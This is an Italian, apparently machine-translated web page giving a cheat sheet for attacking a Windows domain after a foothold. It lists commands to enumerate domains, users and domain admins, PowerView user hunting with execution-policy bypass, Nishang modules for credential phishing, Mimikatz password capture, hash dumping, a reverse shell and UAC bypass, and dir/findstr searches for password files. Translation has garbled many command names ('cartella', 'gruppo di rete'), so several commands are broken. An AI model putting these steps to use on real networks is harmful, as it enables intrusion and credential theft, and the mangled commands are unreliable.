le mie informazioni di contatto
Posta[email protected]
2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Quattro situazioni:
1. Utente locale: utente
2. Utente amministratore locale: disabilitato nella versione home, disponibile solo nel server
3. Utenti all'interno del dominio
4. Amministratore del dominio
Gli utenti locali ordinari non possono ottenere informazioni sul dominio
Gli utenti amministratori locali possono trasferire direttamente i propri diritti agli utenti del sistema (utenti all'interno del dominio) e ottenere informazioni all'interno del dominio.
1. Determina se il dominio esiste:
1. Controllare il dominio: ipconfig/all o systeminfo o net config workstation
ipconfig /all: dominio trovato: hack.com
systeminfo: Il dominio trovato è: hack.com
2. Visualizza l'host DNS del dominio: nome di dominio nslookup (hack.com)
3.Tempo netto/dominio tre situazioni
Il dominio esiste, ma l'utente corrente non è un utente del dominio
Esiste un dominio e l'utente corrente è un utente di dominio
L'ambiente di rete corrente è un gruppo di lavoro e non esiste alcun dominio
1.net view: Visualizza l'elenco dei domini, l'elenco dei computer, le risorse condivise del computer specificato: net view (visualizza l'elenco dei computer) net view \computer (visualizza il computer condiviso specificato)
net view /domain:nome dominio (hack) (visualizza l'elenco dei computer)
Utente 2.net per visualizzare gli utenti locali: utente net/dominio per visualizzare quanti utenti sono presenti nel dominio
Aggiungi utente: nome utente net (admin) password (123)/aggiungi
Utilizzo 3.net: collegare il computer o disconnettere il computer dalla risorsa condivisa, visualizzare le informazioni sulla connessione del computer
4.ora di rete: utilizza l'ora per sincronizzare computer o domini: ora di rete \ora di rete del computer /dominio
5.net start: avvia il servizio o visualizza il servizio avviato: net start service
6.net pause: mette in pausa il servizio in esecuzione: servizio net pause
7.net continue: Riattiva il servizio: servizio net continue
8.net stop: Arresta il servizio Windows NT/2000/2003: servizio net stop
9.net share: elimina, crea o visualizza risorse condivise
Sessione 10.net: elenca o disconnette le sessioni del computer locale e dei client ad esso collegati:
net session //computer (identifica il computer da elencare o sottoporre a sessione)
net session //computer delete (disconnette la sessione del computer specificato)
11.net localgroup Visualizza il gruppo di computer (applicabile solo a locale): nome utente net localgroup
Utente del dominio: nome utente/dominio net localgroup
12.net group interroga il nome del gruppo nel dominio (applicabile solo ai controller di dominio): net group /domain
13.net config visualizza i servizi configurabili attualmente in esecuzione oppure visualizza e modifica la configurazione di un servizio (localmente):
net config (visualizza i servizi in esecuzione) net config services (visualizza un elenco di servizi)
Computer 14.net Aggiungere o eliminare computer dal database del dominio:
net computer \computername /add o /del (aggiungi o elimina computer al dominio di accesso)
Se viene visualizzato "L'elenco dei server di questo gruppo di lavoro non è attualmente disponibile", abilitare i servizi: Server, WorkStation, Browser del computer e chiudere il firewall.
Visualizza dominio: ipconfig/all o systeminfo o net config workstation
Visualizza l'host DNS del dominio: nome di dominio nslookup (hack.com)
Dominio di query: net view/dominio
Interrogare tutti i computer nel dominio: net view /domain:nome dominio
Interroga l'elenco di tutti i gruppi utenti nel dominio: net group /domain
Interrogare l'elenco dei computer di tutti i membri del dominio: gruppo di rete "computer del dominio" /dominio
Interrogare le informazioni sulla password nel dominio: account di rete/dominio
Ottieni informazioni sull'attendibilità del dominio: nltest /domain_trusts
Visualizza il nome del controller di dominio: nltest /DCLIST:hack
Visualizza il nome della macchina, trova l'IP, ping/nslookup: nome del controller di dominio ping/nslookup
A volte il ping è disabilitato. Usa nslookup qui.
Visualizza il nome host del controller di dominio: nslookup ‐type=SRV _ldap._tcp
Controlla l'ora corrente: ora netta/dominio
Visualizza il gruppo di controller di dominio: gruppo di rete "Controller di dominio" /domain
1. Richiedere informazioni sull'utente nel dominio: net user/domain
2. Visualizza gli utenti locali: l'account utente wmic ottiene il nome Utenti del dominio: l'account utente wmic ottiene il dominio, il nome
Utente locale:
Utente del dominio:
3. Controllare gli utenti esistenti: utente dsquery (a volte potrebbe non essere eseguito e può essere eseguito solo sulla macchina server)
4. Interrogare il gruppo utenti dell'amministratore locale: amministratori net localgroup
5. Interrogare gli utenti dell'amministratore di dominio: gruppo di rete "domain admins" /domain
6. Interrogare il gruppo utenti dell'amministratore del dominio: gruppo di rete "Enterprise Admins" /domain
Qui sono necessari due strumenti
Prima carica lo strumento sul server e poi eseguilo
1.PVEFindADUser: PVEFindADUser.exe -current (notare il percorso) Questo strumento può verificare quali utenti hanno effettuato l'accesso al computer, permettendoci di trovare l'amministratore del dominio
2.script powerView:
powershell.exe ‐exec bypass ‐comando "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"
Controlla prima le autorizzazioni: Get-ExecutionPolicy
Modifica la policy in esecuzione: Set-ExecutionPolicy Unrestricted (solo le autorizzazioni Unrestricted possono eseguire pow)
strumento Nishang (c'è un collegamento per il download nell'articolo precedente):
Dopo averlo inserito nella directory CS, importalo direttamente: powershell-import nishang/nishang.psm1
Esegui: comando PowerShell
Alcuni comandi comunemente usati:
Check-VM: controlla se l'host è una macchina virtuale
Invoke-CredentialsPhish: induce con l'inganno l'utente a inserire la propria password
Get-WLAN-Keys: informazioni Wi-Fi
Invoke-Mimikatz: cattura le password
Get-PassHash: ottieni l'hash
Get-PassHints: ottieni informazioni sul suggerimento per la password dell'utente
Invoke-PowerShellTcp: shell di rimbalzo
Invoke-PsUACme: ignora l'UAC
Rimuovi-Aggiornamento: rimuove la patch
Get-Information: informazioni locali
Esempio: PowerShell Check-VM
1. Raccogliere vari file sensibili nelle directory designate
cartella /a /s /bd:"*.txt"
cartella /a /s /b C:"*.xlsx"
cartella /a /s /bd:"*.md"
directory /a /s /bd:"*.sql"
cartella /a /s /bd:"*.pdf"
cartella /a /s /bd:"*.docx"
cartella /a /s /bd:"*.doc"
dir /a /s /bd:"*conf*"
dir /a /s /bd:"*bak*"
dir /a /s /bd:"*password*"
dir /a /s /bd:"*passa*"
dir /a /s /bd:"*accesso*"
dir /a /s /bd:"*utente*"
2. Raccogli varie password di account dai file nella directory specificata
findstr /si passa *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si password utente *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si utente *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
Esempio: dir /a /s /bd:"*.txt"